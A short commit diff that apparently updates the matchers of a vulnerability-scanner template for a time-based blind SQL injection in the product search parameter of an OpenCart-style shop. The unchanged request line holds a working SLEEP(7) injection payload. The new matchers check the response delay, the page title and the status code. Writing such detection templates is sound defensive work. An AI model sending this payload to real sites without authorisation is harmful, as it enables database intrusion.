updated matcher
parent
59e27ab375
commit
1cc5a73784
|
@ -37,12 +37,10 @@ http:
|
||||||
GET /index.php?route=product/search&search=')+AND+(SELECT+8368+FROM+(SELECT(SLEEP(7)))uUDJ)--+Nabb HTTP/1.1
|
GET /index.php?route=product/search&search=')+AND+(SELECT+8368+FROM+(SELECT(SLEEP(7)))uUDJ)--+Nabb HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=7'
|
- 'duration>=7'
|
||||||
|
- 'contains(body, "Nabb</title>")'
|
||||||
- type: status
|
- 'status_code == 200'
|
||||||
status:
|
condition: and
|
||||||
- 200
|
|
||||||
|
|
Loading…
Reference in New Issue